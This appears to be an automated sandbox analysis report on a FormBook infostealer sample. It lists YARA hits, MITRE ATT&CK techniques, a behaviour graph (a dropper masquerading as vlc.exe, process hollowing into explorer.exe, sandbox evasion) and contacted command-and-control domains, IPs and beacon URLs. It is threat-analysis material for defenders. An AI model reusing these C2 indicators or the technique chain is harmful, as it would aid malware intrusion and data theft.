          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_07D9F4A0 GetUserNameA,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder11Process Injection612Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Masquerading1LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion4Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemSystem Information Discovery122Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323829 Sample: SecuriteInfo.com.Generic.mg... Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 45 cdn.onenote.net 2->45 47 www.xn--mgbaht9hj11byu.com 2->47 49 g.msn.com 2->49 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for dropped file 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 8 other signatures 2->61 11 vlc.exe 3 2->11         started        14 SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe 1 6 2->14         started        17 vlc.exe 2 2->17         started        signatures3 process4 file5 71 Injects a PE file into a foreign processes 11->71 19 vlc.exe 11->19         started        39 C:\Users\user\AppData\Roaming\...\vlc.exe, PE32 14->39 dropped 41 C:\Users\user\...\vlc.exe:Zone.Identifier, ASCII 14->41 dropped 43 SecuriteInfo.com.G...87ab642008d.exe.log, ASCII 14->43 dropped 73 Tries to detect virtualization through RDTSC time measurements 14->73 22 SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe 14->22         started        24 vlc.exe 17->24         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 19->63 65 Maps a DLL or memory area into another process 19->65 67 Sample uses process hollowing technique 19->67 69 Queues an APC in another process (thread injection) 19->69 26 explorer.exe 19->26 injected process9 dnsIp10 51 www.theaterseverywhere.com 74.208.236.113, 49750, 80 ONEANDONE-ASBrauerstrasse48DE United States 26->51 53 www.privateinvestigationsanjose.com 52.58.78.16, 49758, 80 AMAZON-02US United States 26->53 75 System process connects to network (likely due to code injection or exploit) 26->75 30 msdt.exe 26->30         started        33 wscript.exe 26->33         started        signatures11 process12 signatures13 77 Modifies the context of a thread in another process (thread injection) 30->77 79 Maps a DLL or memory area into another process 30->79 81 Tries to detect virtualization through RDTSC time measurements 30->81 35 cmd.exe 1 30->35         started        process14 process15 37 conhost.exe 35->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe30%VirustotalBrowse
          SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe29%ReversingLabsWin32.Trojan.Bulz
          SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe100%AviraHEUR/AGEN.1136389
          SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%AviraHEUR/AGEN.1136389
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe29%ReversingLabsWin32.Trojan.Bulz

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.930000.1.unpack100%AviraHEUR/AGEN.1136389Download File
          5.2.vlc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.930000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          11.2.vlc.exe.f50000.1.unpack100%AviraHEUR/AGEN.1136389Download File
          0.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.f20000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          11.0.vlc.exe.f50000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          6.2.vlc.exe.4e0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          5.2.vlc.exe.da0000.1.unpack100%AviraHEUR/AGEN.1136389Download File
          2.0.vlc.exe.ad0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          6.0.vlc.exe.4e0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.vlc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vlc.exe.da0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          0.0.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.f20000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          2.2.vlc.exe.ad0000.0.unpack100%AviraHEUR/AGEN.1136389Download File

          Domains

          SourceDetectionScannerLabelLink
          cdn.onenote.net1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.theaterseverywhere.com/gwg/?9rn=O2JDHJlpz2Rt546p&kzrh28=UuziJZlLt+87/GFWj6zrBRQcAJHtDZRD1SjQzE3VTJ8o0dUkW9Z3aESqk1e2d0LlVQYkCVOcaQ==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/aU0%Avira URL Cloudsafe
          http://www.tiro.com4f0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fontbureau.coml10%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.fontbureau.como)U0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html60%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.xn--mgbaht9hj11byu.com/?9rn=O2JDHJlpz2Rt546p&kzrh28=10pkrk8xXthsIzrXSR/95AORgXFPF0sL7LI6N0%Avira URL Cloudsafe
          http://www.privateinvestigationsanjose.com/gwg/?kzrh28=aQP8xClfH3FnyC2bbHADmWrvnT3A6FAlsj34gFGOFlECHJLTyiLQwMrWm8hFX/dhtuP/m5zmeg==&9rn=O2JDHJlpz2Rt546p0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.urwpp.deno0%Avira URL Cloudsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.fontbureau.comcomd0%Avira URL Cloudsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.comC.TTF0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.tiro.0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.fontbureau.comWU0%Avira URL Cloudsafe
          http://www.fontbureau.comalic0%URL Reputationsafe
          http://www.fontbureau.comalic0%URL Reputationsafe
          http://www.fontbureau.comalic0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.xn--mgbaht9hj11byu.com
          185.88.152.152
          truefalse
            unknown
            www.theaterseverywhere.com
            74.208.236.113
            truetrue
              unknown
              www.privateinvestigationsanjose.com
              52.58.78.16
              truetrue
                unknown
                g.msn.com
                unknown
                unknownfalse
                  high
                  cdn.onenote.net
                  unknown
                  unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.theaterseverywhere.com/gwg/?9rn=O2JDHJlpz2Rt546p&kzrh28=UuziJZlLt+87/GFWj6zrBRQcAJHtDZRD1SjQzE3VTJ8o0dUkW9Z3aESqk1e2d0LlVQYkCVOcaQ==true
                  • Avira URL Cloud: safe
                  unknown
                  http://www.privateinvestigationsanjose.com/gwg/?kzrh28=aQP8xClfH3FnyC2bbHADmWrvnT3A6FAlsj34gFGOFlECHJLTyiLQwMrWm8hFX/dhtuP/m5zmeg==&9rn=O2JDHJlpz2Rt546ptrue
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGSecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designers/?SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers?SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpfalse
                        high
                        http://www.jiyu-kobo.co.jp/aUSecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.340974188.00000000062C5000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
